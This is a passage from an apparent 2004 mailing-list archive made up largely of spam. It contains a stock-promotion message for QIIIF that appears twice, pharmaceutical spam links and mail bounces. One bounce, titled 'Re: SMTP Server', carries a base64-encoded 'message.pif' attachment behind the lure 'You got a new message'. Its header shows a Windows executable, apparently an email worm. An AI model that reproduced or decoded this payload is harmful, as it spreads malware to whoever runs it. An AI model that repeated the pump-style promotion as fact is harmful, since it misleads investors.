new sales and marketing effort, both domestically and internationally. The company is 
promoting its memory card technology utilizing informational programs, direct sales 
contact and an enhanced market presence.

QIIIF is preparing for a renewed presence in high level trade associations, such as 
ACT Canada and Card Tech / Secure Tech, and is planning to attend several major 
technical meetings during the coming year. In addition, the company plans to seek 
promotional opportunities in key trade journals and publications.


STOCK PROFILE OF THE WEEK
QIIIF's focus is the design, development and marketing of payment terminals for smart 
cards. The primary applications are unattended point of sale (UPOS) systems such as 
soft-drink vending machines, snack vending machines, laundry machines (washers and 
dryers), pay-and-display parking systems, newspaper boxes, photocopiers, etc.


INTRODUCTION TO SMART CARDS
A Smart card consists of a microelectronic chip embedded in a plastic card with a 
contact pad on the card's surface and/or an embedded antenna for "contactless" 
communication. As a payment device a smart card is a much enhanced and more versatile 
version of a magneticc stripe card or debit card. Value loaded to a smart card's purse 
is prepaid and resembles cash.  

Smart cards can be used for secure purchase of goods via a payment terminal interfaced 
to a soft drink vending machine, snack vending machine, laundry unit (washer or 
dryer), newspaper vending box, pay-and-display parking terminal, transit gate, 
photocopier or other Unattended Point-Of-Sale (UPOS) device. There is no need for 
exact change or for any change at all. 

Smart cards can be used as well for payment in attended Point Of Sale (POS) 
applications, and can also be used to confirm identity, to access buildings or to 
carry data such as personal health records, driver's license details, and biometric 
data including finger prints or voice prints. Biometrics can be used to further 
authenticate identity for high security applications.


SMART-VEND SOLUTION
SmartVend solution is made for your vending needs. Already the SmartKit has been 
adapted for a variety of applications including Drinks/Snacks, Newspaper, Parking, 
Copier/Vending, Laundry and Water vending.

SmartVend for Printers and Copiers:
SKC supports existing OEM photocopiers by Xerox and Kodak and printers by Hewlett 
Packard and Epson. Interfaces for other OEM equipment can be rapidly developed. 
Depending on host machine support, SKC can be installed at cost-cutting without its 
console housing in existing payment cabinets. The SKC design makes installation 
simple, both in the field and on the factory floor.

Machine sales and vend data upload and exception log handling are accessed by a 
handheld device or merchant accumulator card. SKC may be bundled with either, pre-paid 
disposable, or reloadable cash cards for use with our card dispenser and reload 
stations. All system components support electronic audit.


THE FUTURE OF SMART CARDS
The applications for smart cards in the future is limitless.  We would like to focus 
on one in particular.

As the debate over a national personal identification system intensifies, the smart 
card industry is gearing up a campaign to make sure its chip-based technology is the 
leading contender for such a system.

The Smart Card Alliance, the industry's trade association, released a white paper Jan. 
30 that argues for the advantages of smart cards against other technologies that could 
be candidates for a personal ID card. The alliance will use it to initiate a concerted 
pitch to policymakers in the public and private sectors.

Alliance members have been encouraged by what they see as the leading role of the 
federal government in the recent growth of smart card use.

"Once the Common Access Card [CAC] for the Defense Department has been issued, we 
expect other agencies will begin to pick up on the use of smart cards," said Bob 
Merkert, director of strategic accounts, and PC and network security for SCM 
Microsystems.

DOD has committed to issuing the CAC to 4 million military and civilian employees, he 
said, and distribution could be extended to more than 13 million people when retired 
personnel, family members and others are taken into account.

The State Department also is implementing a smart ID card for automated access control 
of its buildings, the

Undeliverable mail: Re: List

2004-04-27 Thread MAILER-DAEMON
Failed to deliver to '<[EMAIL PROTECTED]>'
LOCAL module(account [EMAIL PROTECTED]) reports:
 message rejected with an automated Rule

Reporting-MTA: dns; frnt6.test.carnation.com.cn

Original-Recipient: rfc822;<[EMAIL PROTECTED]>
Final-Recipient: LOCAL;
Action: failed
Status: 5.0.0
Received: from [61.144.183.11] (HELO chinagames.net)
  by frnt6.test.carnation.com.cn (CommuniGate Pro SMTP 4.0.5)
  with ESMTP id 32210947 for [EMAIL PROTECTED]; Tue, 27 Apr 2004 17:57:33 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: List
Date: Tue, 27 Apr 2004 17:17:30 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="=_NextPart_000_0016=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
Message-ID: <[EMAIL PROTECTED]>


Cpunks, best meds

2004-04-27 Thread Baggiest H. Disrepair



Do you mind? :)))It's funny. All you have to do is say something nobody understands and they'll do practically anything you want them to.Never step over one duty to perform another.
Cpunks, need cheap super-VIA?
http://toughie.gfd-online.com/cia/?dcent peltless
All things whatsoever ye would that men should do to you, do ye even so to them. [Matthew 7:12]Nobody can write the life of a man but those who have eat and drunk and lived in social intercourse with him.scrutinizedYou can travel fifty thousand miles in America without once tasting a piece of good bread.An early-rising man... a good spouse but a bad husband.



MICRO-ELECTRONICS Sector Spotlight - Clients: IBM, VISA, Maytag, Bank of America, USA Today, Tue, 27 Apr 2004 04:05:35 -0500

2004-04-27 Thread Marla
Tue, 27 Apr 2004 04:05:35 -0500

US Stock-Market - Stock Profile of the Week

Symbol: QIIIF
Market: NASDAQ/OTC.BB
Sector: MICRO-ELECTRONICS

QIIIF already has an impressive array of clients, including some of the world's 
leading corporations like IBM, Bank of America, USA Today, VISA Intl., Chase Manhattan 
Bank, Mastercard intl., and more.

Before we begin our profile we have very exciting, breaking news...

RICHMOND, British Columbia---PRNewswire-FirstCall---QI Systems Inc. (QIIIF), the 
industry leader in smart card solutions, announces that the company hass launched a 
new sales and marketing effort, both domestically and internationally. The company is 
promoting its memory card technology utilizing informational programs, direct sales 
contact and an enhanced market presence.

QIIIF is preparing for a renewed presence in high level trade associations, such as 
ACT Canada and Card Tech / Secure Tech, and is planning to attend several major 
technical meetings during the coming year. In addition, the company plans to seek 
promotional opportunities in key trade journals and publications.


STOCK PROFILE OF THE WEEK
QIIIF's focus is the design, development and marketing of payment terminals for smart 
cards. The primary applications are unattended point of sale (UPOS) systems such as 
soft-drink vending machines, snack vending machines, laundry machines (washers and 
dryers), pay-and-display parking systems, newspaper boxes, photocopiers, etc.


INTRODUCTION TO SMART CARDS
A Smart card consists of a microelectronic chip embedded in a plastic card with a 
contact pad on the card's surface and/or an embedded antenna for "contactless" 
communication. As a payment device a smart card is a much enhanced and more versatile 
version of a magneticc stripe card or debit card. Value loaded to a smart card's purse 
is prepaid and resembles cash.  

Smart cards can be used for secure purchase of goods via a payment terminal interfaced 
to a soft drink vending machine, snack vending machine, laundry unit (washer or 
dryer), newspaper vending box, pay-and-display parking terminal, transit gate, 
photocopier or other Unattended Point-Of-Sale (UPOS) device. There is no need for 
exact change or for any change at all. 

Smart cards can be used as well for payment in attended Point Of Sale (POS) 
applications, and can also be used to confirm identity, to access buildings or to 
carry data such as personal health records, driver's license details, and biometric 
data including finger prints or voice prints. Biometrics can be used to further 
authenticate identity for high security applications.


SMART-VEND SOLUTION
SmartVend solution is made for your vending needs. Already the SmartKit has been 
adapted for a variety of applications including Drinks/Snacks, Newspaper, Parking, 
Copier/Vending, Laundry and Water vending.

SmartVend for Printers and Copiers:
SKC supports existing OEM photocopiers by Xerox and Kodak and printers by Hewlett 
Packard and Epson. Interfaces for other OEM equipment can be rapidly developed. 
Depending on host machine support, SKC can be installed at cost-cutting without its 
console housing in existing payment cabinets. The SKC design makes installation 
simple, both in the field and on the factory floor.

Machine sales and vend data upload and exception log handling are accessed by a 
handheld device or merchant accumulator card. SKC may be bundled with either, pre-paid 
disposable, or reloadable cash cards for use with our card dispenser and reload 
stations. All system components support electronic audit.


THE FUTURE OF SMART CARDS
The applications for smart cards in the future is limitless.  We would like to focus 
on one in particular.

As the debate over a national personal identification system intensifies, the smart 
card industry is gearing up a campaign to make sure its chip-based technology is the 
leading contender for such a system.

The Smart Card Alliance, the industry's trade association, released a white paper Jan. 
30 that argues for the advantages of smart cards against other technologies that could 
be candidates for a personal ID card. The alliance will use it to initiate a concerted 
pitch to policymakers in the public and private sectors.

Alliance members have been encouraged by what they see as the leading role of the 
federal government in the recent growth of smart card use.

"Once the Common Access Card [CAC] for the Defense Department has been issued, we 
expect other agencies will begin to pick up on the use of smart cards," said Bob 
Merkert, director of strategic accounts, and PC and network security for SCM 
Microsystems.

DOD has committed to issuing the CAC to 4 million military and civilian employees, he 
said, and distribution could be extended to more than 13 million people when retired 
personnel, family members and others are taken into account.

The State Department also is implementing a smart ID card for automated access control 
of its buildings, the

hello

2004-04-27 Thread kyousaf




  
  

   
  
  Can I ask for a reply to my previous 
  questions.
  Best Regards
  

  
  
   




  - 

 This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom/which they are addressed. If you have received this email in error please notify the system manager at the following email address: [EMAIL PROTECTED] . Please note that any views or opinions presented in this email are solely those of the author and do not necessarily represent those of Al Faisaliah Group. Internet communications cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, arrive late or contain viruses. The sender therefore does not accept liability for any errors or omissions in the context of this message, which arise as a result of Internet transmission.  Finally, the recipient should check this email and any attachments for the presence of viruses. Al Faisaliah Group accepts no liability for any damage caused by any virus transmitted by this email. 

  - 

 


Yeap..it's soo good

2004-04-27 Thread Pereira C.
This is what YOU should try

Surprise your lady and yourself

The best there is C"ial'is

Just check this out:
http://adjwx.gfd-online.com/cia/?biggest


Stopmail:
http://ayu.gfd-online.com/zz.html


Delivery Failure

2004-04-27 Thread DELIVERY-DAEMON
Dear user,
This is the Mail eXchange Server at csc108.com.
I'm afraid I wasn't able to deliver your mail to the following addresses.
<[EMAIL PROTECTED]>
This may be a permanent error; I've given up. Sorry it didn't work out.
--- Below this line is a part of the mail.

Return-Path: <[EMAIL PROTECTED]>
Received: from csc108.com ([218.28.49.179]) by csc108.com with SMTP; 27 Apr 2004 
14:41:57 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: SMTP Server
Date: Tue, 27 Apr 2004 14:34:55 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_NextPart_000_0016=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--=_NextPart_000_0016=_NextPart_000_0016
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit


You got a new message.



--=_NextPart_000_0016=_NextPart_000_0016
Content-Type: application/octet-stream;
name="message.pif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="message.pif"

TVqQAAME//8AALgAQAAA
YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA
AADgAA8BCwEEcgAgAQAAECAAQAAAEAIAAAQA
BAAAMAEAAAQCAAAQAAAQABAAABAQ
AAD0IAEAawCwAABobQAA

dACgEAAA
AADgAADAAHRhcLAAAHRvBAAA4AAAwABh
ABAgAQAAAgIAAOAAAMAFBAYEAQDOIUAAAgAAQG4M
AABAAABAAAC70AFAAL8AEEAAviwcQQBT6AoC0nUFihZG
EtLD/LKApGoCW/8UJHP3M8n/FCRzGDPA/xQkcyGzAkGwEP8UJBLAc/l1P6rr3OhDK8t1
EOg46yis0eh0QRPJ6xyRSMHgCKzoIgAAAD0AfQAAcwqA/AVzBoP4f3cCQUGVi8WzAVaL
9yvw86Re65YzyUH/VCQEE8n/VCQEcvTDX1sPtztPdAhPdBPB5wzrB4t7AleDwwRDQ+lR
X7soIUEAR4s3r1f/E5UzwK51/f4PdO/+D3UGR/83r+sJ/g8PhKLw/v9XVf9TBAkGrXXbi+zD
HCEBNCEBACghAQAAAEAhAQBOIQEAAEAh
AQBOIQEAAEtFUk5FTDMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwDr



AAEAAgAYAQCAKAAAgAMAAABAAACADgAAAGAAAIEA
ZQAAAHgAAIIAAQAAAJAAAIACqAAAgAEA
AAAmAQCAwAAAgQAHBAAA2QAHBAAA
6QAHBAAA+QAHBAAACAEAADCx
aABEGQEA6AIAMEAAACgBADAZAQAi
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
tIaM1+V15RAnWaDzecNEPqSrsZw6ohhbhfy